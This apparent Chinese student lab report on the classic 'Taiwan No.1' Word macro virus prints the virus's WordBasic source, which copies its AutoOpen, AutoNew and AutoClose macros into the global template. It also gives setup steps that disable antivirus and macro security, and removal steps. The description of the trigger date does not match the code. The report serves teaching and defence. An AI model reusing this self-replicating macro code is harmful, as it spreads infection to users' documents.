1、计算机病毒原理台湾1号病毒实验报告计 算 机 病 毒实验报告姓 名:学 号:老 师:日 期:一. 实验目的台湾1号病毒是一种破坏力较大的宏病毒!Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过台湾1号病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。二. 实验内容1. macro virus中的内容 2.计算机病毒篇 -计算机宏病毒 三. 实验环境1. macro virus硬件设备:局域网,终端PC机。系统软件:Windows系列操作系统支撑软件:Word 2003软件设置:关
2、闭杀毒软;打开Word 2003,在工具 宏 安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问.实验环境配置如下图所示:2.计算机宏病毒硬件设备:部署 WIN2003 系统的PC 机一台软件工具:Office word2007四实验步骤及截图台湾1号病毒代码Taiwan No.1 病毒原始码 Dim Shared nm(4) Sub MAIN DisableInput 1 If Day(Now() = 13 Then try: On Error Goto 0 On Error Goto try test = -
3、1 con = 1 tog$ = i = 0 While test = - 1 For i = 0 To 4 nm(i) = Int(Rnd() * 10000) con = (con * nm(i) If i = 4 Then tog$ = tog$ + Str$(nm(4) + =? Goto beg End If tog$ = tog$ + Str$(nm(i) + * Next i rem 随机选出四个千位数, 以便等一下的游戏 beg: Beep rem 电脑发出 哔 一声 ans$ = InputBox$(今天是 + Date$() + ,跟你玩一个心算游戏 + Chr$(13)
4、+ / 若你答错,只好接受震撼教育. + Chr$(13) + / tog$, 台湾 NO.1 Macro Virus) rem 开个对话盒, 以便输入解答用 If RTrim$(LTrim$(ans$) = LTrim$(Str$(con) Then MsgBox 恭贺你答对了,按确定就告诉你想知道的., / 台湾 NO.1 Macro Virus FileNewDefault CenterPara FormatFont .Font = 细明体, .Points = 16, .Bold = 1, .Underline = 1 Beep Insert 何谓巨集病毒? InsertPara Be
5、ep Insert 答案: Italic 1 Insert 我就是. InsertPara InsertPara Italic 0 FormatFont .Font = 细明体, .Points = 16, .Bold = 1, .Underline = 1 Beep Insert 如何预防巨集病毒? InsertPara Beep Insert 答案: Italic 1 Insert 不要看我. Goto exit Else For j = 1 To 20 Beep FileNewDefault Next j CenterPara FormatFont .Font = 细明体, .Point
6、s = 16, .Bold = 1, .Underline = 1 Insert 巨集病毒 Goto try End If Wend End If nor = CountMacros(0) If nor 0 Then For kk = 1 To nor If MacroName$(kk, 0) = AutoOpen Then t = 1 End If Next kk End If file$ = FileName$() filem$ = file$ + :AutoOpen If t 1 Then MacroCopy filem$, AutoOpen MacroCopy filem$, Auto
7、New MacroCopy filem$, AutoClose End If nor1 = CountMacros(1) If nor1 0 Then For kkk = 1 To nor1 If MacroName$(kkk, 1) = AutoOpen Then tt = 1 End If Next kkk End If If tt 1 Then FileSaveAs .Format = 1 MacroCopy AutoOpen, filem$ End If exit: End Sub该病毒的效果如下:当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是
8、1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:何谓宏病毒答案:我就是.将系统日期设为XX月1号如果答错,就会不停地刷屏,然后继续让你答题,否则跳出如下界面:计算机宏病毒1). 新建Word 文档并打开2). 调出开发工具,设置宏的等级,启用宏3). 创建宏,命名AutoExec 编辑4). 编辑宏,语法上注意VBA 版本保存5). 关闭所有Word(必须)6). 再次打开Word 文档,宏病毒爆发,弹出刚刚编写的 msgbox 窗口7). 启动任务管理器结束进程搜索 winwor
9、d.exe 文件,并确定复制其位置8). 启用CMD,定位winword 位置:输入命令,用参数来打开安全模式winword.exe /a(执行此命令2 次)第一次安全模式第二次新建文档进行宏的打开设置 来禁用宏9). 搜索normal.dotm 等模板文件,若搜索不出东西,在高级选项中选中搜索隐藏文件及系统文件即可,并删除那个文件夹下的所有模板10). 简易摆脱宏完成,重新打开word,没有被感染。五. 总结与心得在使用电脑的过程中,我们要加强电脑的安全指数,要有防范意识,防止网络病毒的入侵!特别是在现代网络发达的社会,一旦被高级病毒入侵,很有可能带来重大损失!同时也应该学好病毒知识,这样,我们就可以知道如何去解决病毒问题,让我们免受损失!
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1